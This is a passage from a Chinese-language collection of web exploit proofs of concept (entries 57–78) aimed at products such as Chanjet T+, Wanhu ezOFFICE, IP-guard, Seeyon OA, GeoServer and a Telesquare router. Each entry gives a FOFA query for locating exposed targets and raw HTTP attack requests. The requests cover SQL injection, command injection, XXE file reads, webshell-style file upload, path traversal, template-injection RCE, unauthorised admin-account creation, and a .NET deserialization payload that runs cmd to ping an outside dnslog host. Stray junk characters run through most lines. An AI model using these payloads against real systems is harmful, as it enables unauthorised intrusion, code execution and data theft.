3 i( r/ V: M; O) oHost: x.x.x.x2 x) \9 R! ~* H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
' {- t3 n$ y9 ^% k# YContent-Type: application/json2 U8 }/ Q, m% z
0 y4 ^+ b. E; h{
5 S9 J* ?6 _% t& M# A1 P "storeID":{( @; J+ l0 l0 \
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",2 R2 p0 D+ a% a& l: J; G) i' l/ A
"MethodName":"Start",7 m0 `/ g* S" T% o+ u6 y3 s
"ObjectInstance":{
! X/ Z' |5 G" J. ?8 \2 J: N "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 i9 f; z* E; \ "StartInfo": {
0 \! [. C7 j+ Y "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) ]& k& I* s6 {. L$ _0 ~ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"1 i9 t4 D8 N! I
}- |9 i6 C- l) y- |
}
4 ^. w! y1 d8 {% ]' j- s" H }3 V. }/ o9 m5 n2 ]+ r
}
" J, V! B" m. R3 C* w6 a7 _+ o% S( m
) L) V( A( l$ d- I; ]7 K6 L, O$ k; {$ [2 P y. J" [
57. 畅捷通T+ keyEdit.aspx SQL注入( P" x0 U3 t% X& T' m) d
FOFA:app="畅捷通-TPlus"
8 [' M+ T! ]2 r9 HGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1; p$ a4 H7 w. O6 p! V
Host: host1 p3 O* w5 i9 w S
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
3 z* W! V0 u. L0 AAccept-Charset: utf-8+ {; s# F; n7 [# I( [
Accept-Encoding: gzip, deflate
5 R7 M7 f9 o' AConnection: close! c* I3 F! W9 z$ e3 j( V
7 D( Y5 Q, F! k% Q
: Q5 a s8 ~2 c! c
58. 畅捷通T+ KeyInfoList.aspx sql注入4 H' @$ j: K B3 J6 `; G4 w' T( Q
FOFA:app="畅捷通-TPlus": E; a2 j# b7 w9 w( P
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.12 k8 |! P% J7 Y. D0 P% R* y* U0 G
Host: your-ip6 s" m* L1 }! O6 N
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" [) a. r6 H* c( ]) ~* r" R0 ?Accept-Charset: utf-8
* b2 Y9 E" ?% t3 u6 jAccept-Encoding: gzip, deflate
; M" s/ p( V) O% |$ w' {% PConnection: close/ Y& g7 h W, N, _6 g; p3 R3 C
! H4 k- ]% @' w) c8 [4 R, ]( ~8 h; v
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
7 }8 l8 U; ]& [FOFA: title="@XETUX" && title="XPOS" && body="BackEnd", V4 b$ K) q4 |. n# ]
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.18 _- J2 a- _) L3 W5 n5 b
Host: 192.168.86.128:9090" K- N) M# k5 x8 S
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
# Y) W4 `/ e2 ~7 ]3 w+ o2 DConnection: close
1 X4 h( t- r( DContent-Length: 1669
4 Q+ B* \9 n) C$ N, hAccept: */*4 L" |% F# I- u: x1 b3 k
Accept-Language: en3 {8 |8 r; B* X! c6 Q
Content-Type: application/x-www-form-urlencoded
! M% s6 D6 l5 o( k. H; I2 bAccept-Encoding: gzip
/ U) Z2 Q$ @7 j+ h5 N7 `: v
^. i2 |: C) f8 d/ @PAYLOAD
W h3 z u/ j, d% L' \: U6 P
) e& M \5 V1 [: z) F& N3 W+ A! |- V* b2 B; w
60. 百卓Smart管理平台 importexport.php SQL注入8 Y. h: A5 D# t
FOFA:title="Smart管理平台". e% U* ~8 O5 r+ w2 \: b
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1/ d( D+ d1 t1 l( D2 _
Host:! G# D$ Q, z& x& V$ } l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
H* B/ Y0 ~2 D8 m0 G% `: v; _6 P6 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- ]" u ], J- V. C/ h
Accept-Encoding: gzip, deflate
2 e( I: y. _7 r& y, q: X8 A! oAccept-Language: zh-CN,zh;q=0.9
; J% U" B+ M* G2 M6 T: U- A: qConnection: close+ O) d' G( Q$ R4 ?7 y
3 ~ h1 R& ?- ~9 b! b8 B
+ u8 `* j4 q1 I. X6 B( ~61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
9 T3 j; h6 O% Z( J# FFOFA: title="欢迎使用浙大恩特客户资源管理系统"
0 k/ q$ q5 P$ e+ RPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1( ]' ^/ T! A8 f( v$ @: J1 b
Host: x.x.x.x; E2 b8 p6 P5 K [- p" N/ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) D: ]$ M( {, k0 o7 |Connection: close, ^8 o2 E3 I) n# j
Content-Length: 274 X% u* [7 [% A; w
Accept: */*& p6 C/ A: h* U
Accept-Encoding: gzip, deflate- o( H# g; f: ~
Accept-Language: en
$ m$ Y& F, _" ]0 vContent-Type: application/x-www-form-urlencoded
9 i* \: z* L$ @! D8 I! [+ p+ H' c
6 I5 Z4 v5 T9 V/ C' k8uxssX66eqrqtKObcVa0kid98xa
R2 ?$ @0 C5 O" T# d3 b6 |
8 E* G' Q% m1 {+ @- w/ O& U" L: U! _7 y* I& ]
62. IP-guard WebServer 远程命令执行
' f7 \0 M3 O; n, V- s! H7 sFOFA:"IP-guard" && icon_hash="2030860561"3 \5 S) }9 q. R, e. c7 E
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
0 d' V& _5 T$ T& N' lHost: x.x.x.x/ j$ Z4 J* \( R% z: ^; u
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
1 y' x3 m1 x) S' Z: X; RConnection: close
7 F- K0 S. Z# X& S6 l \9 O% I' gAccept: */*; T* g- e( P0 x# E
Accept-Language: en
+ j1 z# ^6 K/ f1 QAccept-Encoding: gzip1 {- r" [6 ?2 L+ ]- H5 Y1 ~. m
1 p7 J' r- c& f/ B
' C; b' P) J) A+ y; \; X3 c1 a& R访问; g% A: f) X1 L- \. m( D3 M
m8 m" j8 B/ p6 w o5 eGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
6 C. @- c* y# u, i8 j$ W9 z8 ~/ JHost: x.x.x.x: C/ F' w8 {& I) e1 u: k
% @! A. Q9 D, Y
# W/ J, {! ^+ W: A" Z
63. IP-guard WebServer任意文件读取/ ~: Z3 X1 U$ m( ^* @
IP-guard < 4.82.0609.0
9 ]6 W, T1 ^/ Q; s- j$ X9 ^FOFA:icon_hash="2030860561"% J! w6 l0 `3 f
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1% F/ A" [' Z7 u* r; r& ]+ V
Host: your-ip
6 y# @* L0 Y5 R! g, q/ [' K9 }+ DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* ? c, O" A q" E+ @6 u; i5 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* Y+ z& L7 ~- z/ Y) [" NAccept-Encoding: gzip, deflate
2 k" s. N6 Y i0 tAccept-Language: zh-CN,zh;q=0.9+ ?& b3 w3 a! Y. u
Connection: close9 |+ o* E' O3 a. k+ t% ?
Content-Type: application/x-www-form-urlencoded
' o/ v0 K+ \/ H2 L/ K
. D) r0 X( o$ a7 I: G+ ~0 jpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
: s/ d$ ~7 Q' z: f. z9 w8 E) @
* y6 s6 D1 J d- j/ }64. 捷诚管理信息系统CWSFinanceCommon SQL注入" T. o* J2 V8 @
FOFA:body="/Scripts/EnjoyMsg.js"2 j" o3 z* x5 e& x
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
+ Y) p8 S5 M2 h3 mHost: 192.168.86.128:9001
1 n8 p& Y( V T6 UUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
6 f2 q6 n( H; nConnection: close* [2 P6 P A, E& [- ~
Content-Length: 3692 I; V O1 @- U
Accept: */*% _ W: ~4 X4 F( `4 n" T! V
Accept-Language: en
' t0 l$ o6 H' u7 u2 z, xContent-Type: text/xml; charset=utf-8
5 H5 m/ o6 }: m! T$ v+ C8 X4 ]Accept-Encoding: gzip: u2 w- h4 `8 F" T* h- C
! c5 P+ u" N/ P9 A+ l$ F<?xml version="1.0" encoding="utf-8"?>& l; T9 [3 S3 y' e$ k" g
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
. o- j+ G) l: b<soap:Body>
6 K4 g! s; A! j: T( M <GetOSpById xmlns="http://tempuri.org/">
0 K' j- I H% H& }! S7 k <sId>1';waitfor delay '0:0:5'--+</sId>
2 I- E6 _8 E3 p4 c. t </GetOSpById>
2 d/ z0 L, l& o$ A </soap:Body>
$ | m" A) l, l! Y# p' P& y</soap:Envelope>
9 j$ ~: u! h! M+ D* }. G5 M
+ g( {7 P5 Z& X3 p( N1 b u: a& b8 ?1 D$ g v7 S
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
+ e6 i$ e. G' M0 q+ cFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"' S0 [. |/ Q2 b/ l- _; Q* \
响应200即成功创建账号test123456/1234569 b% P5 I' D' O
POST /SystemMng.ashx HTTP/1.1" ]/ l( a, O! }
Host:
. S/ g% P: N; E( u( i& O; l& KUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
" g! J3 b/ L# e2 M8 g- L4 XAccept-Encoding: gzip, deflate+ F# M1 E) a8 s2 L& m1 C& N
Accept: */*
, L& s3 C& R) Z S& \, ~Connection: close T7 U. r' P0 G' p
Accept-Language: en
# k9 Z1 n: {4 k. c! a4 [6 r$ VContent-Length: 174& m& Z ]% t* B' M; w1 ?
- O& E6 ?' o# d2 F% @operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
0 b( O; O) _: i- Y
J8 C. U# N& M2 H* w: T
1 w8 f3 H, ?* F66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
: D$ x/ I+ Y+ A+ S( sFOFA:app="万户ezOFFICE协同管理平台"; m( h- L. \! k% x5 x
2 X1 p! m+ O* x& Q0 C3 k+ {: H
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1* s* J0 h7 m% f8 n: i& U2 q/ g
Host: x.x.x.x1 n- b( \+ g5 J; w3 `8 n: U, z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) ~/ M6 ]% m) L* m+ r- l* U4 cConnection: close
: A: y: Z6 C, r# e5 e3 v3 WAccept: */*# ~- G% b4 L8 T. b
Accept-Language: en
H6 Q+ S, n& R/ J4 X# L' ~Accept-Encoding: gzip3 C, u, [7 I+ q+ K% R. h, W
6 @1 F9 h9 Y/ v. C+ o5 Z* G2 }+ R' _
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
% I. v5 N: k' |
' L# }8 V- u( I* C5 Q* M67. 万户ezOFFICE wpsservlet任意文件上传
# F! N& v g/ P- n6 x6 B- hFOFA:app="万户网络-ezOFFICE"
3 A) s1 S7 D K3 p% I0 dnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型: Z3 D3 w' T K
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
% H! q2 k3 H9 t" B" nHost: x.x.x.x
9 E. q0 N+ u7 k3 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+ T" b6 }5 k% p+ ^Content-Length: 1737 a/ a" P; r' Q- _% H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.83 @, S8 v# m$ `7 ^
Accept-Encoding: gzip, deflate
+ T6 O' C$ B" s% x' w7 F i2 fAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
) |& u0 y" H9 i! s) e& v# pConnection: close2 {9 r: ?+ I. K- i' e; C" O- P8 q
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp# E5 L0 L% ~# L0 I3 z; k4 M
DNT: 1" [- f# N8 h( U9 ?$ B$ w; @
Upgrade-Insecure-Requests: 1
5 i' z. _ C. q5 o. a7 F( d- A' b" N
--ufuadpxathqvxfqnuyuqaozvseiueerp
# `/ U+ Q+ ^& |! `; D* f- tContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"! z% I7 E1 n. S: d7 L
6 d+ q4 ^8 }! X% p: V2 M<% out.print("sasdfghjkj");%>
& u8 {) V3 P8 B--ufuadpxathqvxfqnuyuqaozvseiueerp--
% }: C9 ], w% m) x7 q3 L7 Z6 j) _* f
, k2 b- U: T$ {
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp$ W" k, F. S. F. N
9 X5 t9 Y' z% }' c' o1 }
68. 万户ezOFFICE wf_printnum.jsp SQL注入
5 y4 h2 A/ i" GFOFA:app="万户ezOFFICE协同管理平台"
h$ R# ?8 U. o, c1 r' V# J3 \% jGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
1 x& T8 F" s, YHost: {{host}}
/ Y2 X% z! V0 F) U$ p* GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36: n( h2 b5 ?2 p' M# B8 m' D5 M* s
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
5 V/ k2 b, N2 _ R+ R7 M0 N/ R$ P: o' n+ DAccept-Encoding: gzip, deflate. W/ z0 L( }" W1 x8 B7 Z2 y
Accept-Language: zh-CN,zh;q=0.9
. Q1 G) ~' X- n g; s" A6 YConnection: close
- {2 u2 f" C& d* `1 G* z, p" v- y9 x+ Z# f6 k* b
& p2 h* Q# m8 Y/ _: X. z* m/ k
69. 万户 ezOFFICE contract_gd.jsp SQL注入) ]) F3 Q- w/ r* k, z& j
FOFA:app="万户ezOFFICE协同管理平台"' j6 s3 X6 L( \) \$ b
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.12 r5 ~8 p0 o; W: N# q& o
Host: your-ip1 G4 K0 E1 N/ ?% l6 a
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 M8 g' a6 b9 O: Y* v8 g3 L. E% fAccept-Encoding: gzip, deflate' A# c% q) d" T$ i
Accept: */*) i9 \1 X" V @& R j. Q: z' ~
Connection: keep-alive, w) V, G% A* j; i9 w
) A$ n3 C9 k: X
% p" L; A; s$ D% F! `70. 万户ezEIP success 命令执行3 z" z7 d- {! K( p0 }0 t
FOFA:app="万户网络-ezEIP"
' o7 ?$ e& G ~' G9 ]POST /member/success.aspx HTTP/1.1
8 T- j) _# r k Y# P& M* [Host: {{Hostname}}
T4 }% a2 d5 Q1 l) V( tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% f/ |) _( S5 Z2 OSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
7 d1 ^9 T: ]( w' U& yContent-Type: application/x-www-form-urlencoded3 E: d2 F: Y' g
TYPE: C
' s+ }/ N' r2 A' \Content-Length: 16702; V+ a( m e# B$ _' V
4 t# [7 W! t3 G. W4 g$ ~
__VIEWSTATE=PAYLOAD h/ e8 n+ K5 o h/ Y2 _" K, ]
, a% q9 d9 R; Y! l! \2 r: T+ Z
9 I- t( q- d3 q0 F71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入8 Y# L$ G/ ?% F. q; `! W
FOFA:body="PM2项目管理系统BS版增强工具.zip"
! y3 T0 B7 `; \- r0 ^GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
6 N6 ]) v* c+ b' p0 |Host: x.x.x.xx.x.x.x
4 H {& d$ l) V$ Y2 H v6 ?User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
, S h7 w k$ A$ J I" K& TConnection: close
1 ^0 a0 P. Q" q _1 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& D6 ^, Z% O9 b( _8 O. fAccept-Encoding: gzip, deflate5 Z4 I% Z* u% W5 K# L3 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 y, L$ i0 L# V& Q, u/ `
Upgrade-Insecure-Requests: 1
8 V! U& |# Y* _% E6 Z
5 u$ `4 j' G6 u' K
4 n6 v O5 K6 G2 f' P5 A$ u6 S72. 致远OA getAjaxDataServlet XXE
+ o; G1 ^1 N3 Q" Y3 K2 dFOFA:app="致远互联-OA") f# n) [/ h$ m3 Q. U
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1. L$ ?; j% h5 |
Host: 192.168.40.131:8099
( D' s9 t5 W. M/ X( _! T- ?User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 N/ ?7 u3 h& j( t" @
Connection: close
7 ~! @! L) L1 U9 U+ Z7 {Content-Length: 583
" A2 @: g" i v6 ]Content-Type: application/x-www-form-urlencoded
3 _1 t# y& U' x1 h5 |Accept-Encoding: gzip% _3 @+ Q! O" g3 a
/ a3 Y% F& a- V, C, KS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
. H5 o% {4 R+ v2 e [, G# M9 I) x2 ]2 c, |1 i; G! }4 P
$ T% i4 f: \8 e, h6 ]# I. @73. GeoServer wms远程代码执行. j, p2 J, H' w% g9 \
FOFA:icon_hash=”97540678”
$ W( d; j- Y( W/ E) J/ Y( n+ sPOST /geoserver/wms HTTP/1.1 t- e4 y* q0 Q9 j
Host:
+ E! Z% ^! w5 N% o" r h l. F9 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
G5 H" G( ^' X2 nContent-Length: 1981
2 h- ~( i- f3 Q; W7 r7 R* ~; jAccept-Encoding: gzip, deflate3 [5 v7 d4 v _/ j
Connection: close0 u' V: |1 `& j' P. X; {. `- {/ T
Content-Type: application/xml
1 g4 U% k4 @. jSL-CE-SUID: 3$ T: |; P2 P1 G: B C% M7 G. I
0 D; b: M5 \( Z7 f3 M) z
PAYLOAD
! ~7 A$ V# ^9 b: F/ i9 @ v
" ]( f4 F% b, f" E. }5 s1 n- Q: H' p `% ^5 u: U6 q$ N
74. 致远M3-server 6_1sp1 反序列化RCE- @$ [" H K' `8 ?" [
FOFA:title="M3-Server"
# M; L6 Z# _! P! z6 U9 yPAYLOAD
7 r0 m) m8 U3 Q% O: I) M0 B. }- C( k) q3 @4 ?6 X- ~6 p
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
N. \9 J! {/ `FOFA:app="TELESQUARE-TLR-2005KSH"+ u A7 A6 X4 ~8 [" g# s0 w
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
! C5 a$ D8 P1 a7 EHost: x.x.x.x
0 c) `9 M5 ]0 Y' NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 e3 F, G& |$ n& O, YConnection: close& g( z2 p" X w! s K3 N
Accept: */*) e: G' F' Y0 u1 U
Accept-Language: en& ?" y( J; {' U, s6 K @0 O7 R( o
Accept-Encoding: gzip
* N% F0 H: d/ D) V
, `( {! w1 P1 j( V5 p6 \: @4 s! F! A" J- p& A8 t, W* H
GET /cgi-bin/test28256.txt HTTP/1.1, O" T# N$ b3 E( T7 I
Host: x.x.x.x" \& ?; S7 Q" L: Q1 E
0 R; j0 X) a- Y. g% e/ @9 o( J1 A( J3 @8 y/ q+ S4 f5 f- D6 v+ ?2 U
76. 新开普掌上校园服务管理平台service.action远程命令执行; ?) H6 C9 h2 S+ q6 k3 {/ i
FOFA:title="掌上校园服务管理平台"9 E3 C/ X, F- |* E% M( ~1 @- |: @
POST /service_transport/service.action HTTP/1.1& X- ]' q9 C/ A6 f
Host: x.x.x.x0 G( K( d2 N+ g$ ^3 F! a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
% }9 J- \4 o2 GConnection: close
7 |1 g4 U, @ ^) {( b% z% C& E7 RContent-Length: 211
' ^5 x. Q+ {! h; @4 C8 {& i$ rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 N: W4 y7 O9 H/ Y) r: r
Accept-Encoding: gzip, deflate
% _" g' m4 p8 @. h) B( k) FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) N& C) Z" ^$ X: R
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
8 I* P, ?6 V2 X7 \& JUpgrade-Insecure-Requests: 14 O5 O/ v1 Y( j9 F+ m4 O
+ {% j; n K3 l8 [7 P{
6 ]7 {; H$ p/ G$ D( N" m8 d6 g"command": "GetFZinfo",( J @0 Y+ ]3 _2 y2 f
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\" i5 f2 S, D1 g) ]
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
/ b$ [4 r1 @7 @}" W+ e" L0 W0 @2 J2 b* ]% y9 {
& O9 D' z/ v# ]) t' ?( D; ]
- E1 A- G! |+ S1 lGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
, [2 u& o2 N, ?% K w- xHost: x.x.x.x
; w2 z. |. d9 c; T7 L0 @$ U) c3 a* {0 Z3 s
1 q+ X V! u6 F2 q
* y3 x! A* D4 L
77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ m% q& b% ^9 ]! Q0 C7 o: g
FOFA:body="F22WEB登陆"* w5 w% [6 E/ n, r9 @
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1 d3 r: I7 _# ^2 d) c. K/ O
Host: x.x.x.x
6 c, P+ B- Q# P8 @4 T5 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( K" J, Y: O, |# G, B. A oConnection: close& g) j# q) `$ y" j- p
Content-Length: 433% N. ~( w/ Y% H+ g8 N8 g
Accept: */*' B1 I n" O9 }5 N
Accept-Encoding: gzip, deflate! q+ U" L3 C% O3 e
Accept-Language: zh-CN,zh;q=0.9
" t& R8 u& o5 u( k4 j5 W( \2 pContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
( {: `! }: [0 h4 ]2 I3 [" W) A3 j! H% T+ i% I
------------398jnjVTTlDVXHlE7yYnfwBoix! N# j6 K0 b4 d6 n$ |
Content-Disposition: form-data; name="folder"8 k( ]! E8 e9 l$ i
) m) D" p# ~* b9 b
/upload/udplog
2 X1 `# S$ A" p8 K6 n( Y/ O------------398jnjVTTlDVXHlE7yYnfwBoix" [( U- B, u% \( c. i1 l
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
% F; s/ p4 M5 b$ QContent-Type: application/octet-stream( Z( \* |. V3 V0 S: Z, ^. u! U, `5 R
- R: L; _/ I) k& o2 U
hello1234567
! ?% h$ {1 {6 h" [9 v------------398jnjVTTlDVXHlE7yYnfwBoix
; s! x; `3 L% ?9 g( s4 u1 V9 kContent-Disposition: form-data; name="Upload", [0 P- O& _0 z+ n
; R6 h7 @, R( C$ v+ I, ?* vSubmit Query
* s7 I( y$ K! [# h0 @------------398jnjVTTlDVXHlE7yYnfwBoix--
% D+ r3 U1 G. J
u5 a/ I+ s- P5 [: y; Y; X# E( W# f# m! A; U( ~$ k, a
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
' o) \* v& Z/ E6 Y6 k% e' K) ~FOFA:icon_hash="2001627082"
4 F8 T$ ~% o9 M+ d5 @5 m1 i+ k2 RPOST /Platform/System/FileUpload.ashx HTTP/1.1% N% ^7 b& i& x' k, T2 C: C
Host: x.x.x.x
b; L7 r; N- k/ I, mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& V# R+ t8 Z& L1 P7 t
Connection: close6 {! n% R9 U$ U' I0 O
Content-Length: 3361 b3 E7 q: U; ~3 U5 m
Accept-Encoding: gzip
6 C- H% u* C5 k% A1 ?* C- `! NContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l6 L' E, M b/ U9 z* F6 a
p" O7 H/ J7 r
------YsOxWxSvj1KyZow1PTsh98fdu6l
8 o" ]& i/ s0 ^+ z7 X# j- R* h+ p' AContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
, d- @& G( J9 b% [0 vContent-Type: image/png- l+ X, c* v) ^" d3 k
, a6 a) W5 j1 t/ \. ?. gYsOxWxSvj1KyZow1PTsh98fdu6l/ d$ X+ y, q( Q( s# B6 w
------YsOxWxSvj1KyZow1PTsh98fdu6l( q4 ~8 Q9 l; C* J5 Z
Content-Disposition: form-data; name="target"; v- R2 z! d% O+ y& y5 y
/ g3 y& d; G7 _5 C5 l0 V/Applications/SkillDevelopAndEHS/
- H2 {2 }# b( X------YsOxWxSvj1KyZow1PTsh98fdu6l--
; G5 k7 t/ f+ v+ G2 Z# ^8 ^
8 I2 [ E \8 d
